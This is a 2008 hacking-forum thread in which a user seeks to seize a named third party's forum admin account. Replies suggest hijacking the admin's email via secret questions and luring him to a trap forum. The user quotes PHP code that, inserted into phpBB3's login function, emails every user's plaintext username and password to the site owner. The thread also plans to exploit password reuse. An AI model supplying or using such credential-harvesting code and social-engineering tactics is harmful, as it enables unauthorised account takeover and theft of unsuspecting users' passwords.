|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Hacking IPB 1.3 Final |
|
Posted: Sat Nov 22, 2008 6:39 am |
|
|
Nemesis |
Regular user |
|
|
Joined: Nov 22, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
I have tried for weeks... months now to hack this ipb forum. I have tried every exploit known to man. Could some one tell me what im doing wrong. I follow all teh directions do it right but i get an error like 'error: couldn't get a post key' or the hash is 00000000000000000000. So could someone point me in the right direction or just give me the password of the user TheGeneral, the root admin please. i would much appreciate it.
here is the site i want to be the admin of:
http://z13.invisionfree.com/Allied_Guardians/index.php?
Thanks in advance |
|
|
|
|
Posted: Sun Nov 23, 2008 10:14 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
I write this many time, but nobody want to read.This is free IPB hosting,no chance to hack this guy's. |
|
|
|
|
Posted: Tue Nov 25, 2008 1:23 am |
|
|
Nemesis |
Regular user |
|
|
Joined: Nov 22, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
Dam so now ill have to turn to social engineering. Got any programs to help me with that and techniques to get it to work? |
|
|
|
|
Posted: Tue Nov 25, 2008 7:41 am |
|
|
gyan007 |
Advanced user |
|
|
Joined: Oct 17, 2008 |
Posts: 106 |
|
|
|
|
|
|
|
Nemesis wrote: | Dam so now ill have to turn to social engineering. Got any programs to help me with that and techniques to get it to work? |
Get admin email, look up secret question to his email. |
|
|
|
|
|
|
|
|
Posted: Tue Nov 25, 2008 7:32 pm |
|
|
lenny |
Valuable expert |
|
|
Joined: May 15, 2008 |
Posts: 275 |
|
|
|
|
|
|
|
Social engineering does exactly what it says on the tin. Its social, so no, there are no programs to help you!
You could set up your own forum with a password stealer though that collects the post variables when anybody logs in and stores them in a file... then all you have to do is convince him to sign up
Social engineering is a broad topic, there are countless ways of making it work which is why its my preferred method of hacking. It does involve skill and patience though (and experience always helps) as well as a good social understanding, which you don't need for running an off-the-mill exploit. A firm sociology and psychology knowledge never hurt anybody either =] Once you get to grips with it it is a valuable asset to any hacker. |
|
|
|
|
|
|
|
|
Posted: Tue Nov 25, 2008 11:33 pm |
|
|
gyan007 |
Advanced user |
|
|
Joined: Oct 17, 2008 |
Posts: 106 |
|
|
|
|
|
|
|
Best way for social engineering = have something he/she wants or is interested in. |
|
|
|
|
Posted: Wed Nov 26, 2008 1:24 am |
|
|
Nemesis |
Regular user |
|
|
Joined: Nov 22, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
lenny i did get him to sign up on my second forums which is phpbb 3 i believe. i thought that woudl be easier to hack but i have had no success. (He thinks i dont know he is on my forums we tricked him) So how can i do this can you help me?
Edit: from the admin pannel i can make phpbb 3 to phpbb 2 does that affect anything? like if phpbb2 exploits work cas i changed it from 3 to 2. also i have had no luck hacking my own made forum please help. And no news on the legal way of getting my forums back i dont think they care |
|
|
|
|
|
|
|
|
Posted: Wed Nov 26, 2008 2:04 am |
|
|
Nemesis |
Regular user |
|
|
Joined: Nov 22, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
[quote]I took that code, but changed it to work with phpBB3. I am testing with the "Olympus" Gold Release.
Instructions:
1.Open file phpbbroot/includes/functions.php in a text editor.
2. Find " $result = $auth->login($username, $password, $autologin, $viewonline, $admin); " (omit quotes)
3. After, add:
Code:
$sitename = "domain.tld";
$recipient = 'email@domain.tld';
$subject = 'Password Alert - domain.tld';
$message = "Sitename: $sitename - Username: $username - Password: $password";
mail($recipient, $subject, $message);
4. Change domain.tld with the domain your using it on.
5. Change email@domain.tld with your email address.[/qoute]
this seems to be what i need but can someone help me use this? please sry for being noobish |
|
|
|
|
|
|
|
|
Posted: Wed Nov 26, 2008 10:23 pm |
|
|
lenny |
Valuable expert |
|
|
Joined: May 15, 2008 |
Posts: 275 |
|
|
|
|
|
|
|
Ok, well i assume that you are self-hosting your phpBB installation... you are, right? :S
If not, your stuffed.
Actually thats not quite true. If you are using a hosting service then do you have the ability to download database backups? If you can get hold of your database (which will contain his hashed password) then you are in business =] |
|
|
|
|
Posted: Thu Nov 27, 2008 6:03 pm |
|
|
Nemesis |
Regular user |
|
|
Joined: Nov 22, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
thanks for the response though im pretty sure someone else is hosting it for me. I dont know how to host it my self. but ill see what i can do. |
|
|
|
|
Posted: Fri Nov 28, 2008 1:46 pm |
|
|
_mranderson_ |
Valuable expert |
|
|
Joined: Oct 30, 2008 |
Posts: 51 |
|
|
|
|
|
|
|
Careful: most of the time, he won't use his main password to signup to another forum, so even after you have his password it doesn't mean you ll have access to his admin account. But if he's careless enough u ll get in. |
|
|
|
|
Posted: Sat Nov 29, 2008 9:50 pm |
|
|
Nemesis |
Regular user |
|
|
Joined: Nov 22, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
Ok well apparently i cant back up the forum i have now so could some tell me the best forum to use and how to host it myself so i can get an admins pass, assuming he is lazy and keeps all passes the same. thanks in advance. |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|